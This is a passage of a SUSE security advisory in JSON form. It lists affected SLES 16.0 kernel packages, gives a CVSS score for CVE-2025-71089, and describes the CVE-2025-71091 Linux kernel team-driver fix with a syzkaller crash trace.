"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
